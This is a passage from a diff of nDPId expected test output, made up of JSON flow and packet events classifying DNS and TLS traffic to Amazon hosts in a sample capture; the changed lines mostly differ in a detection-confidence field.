{"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01601{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01128{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01601{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1490976196840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976196840,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WmdAAEARM02sECrYrBAqAQqTADUAK8ZJ2BYBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1490976196938,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976196938,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP7ApAAEARoZmsECoBrBAq2AA1CpMAO2jR2BaBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AARIFc55"} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}} +00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3379,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976197297,"flow_last_seen":1490976197532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976197532,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3365,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1870,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3367,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976196942,"flow_last_seen":1490976197363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4790,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1490976197363,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - 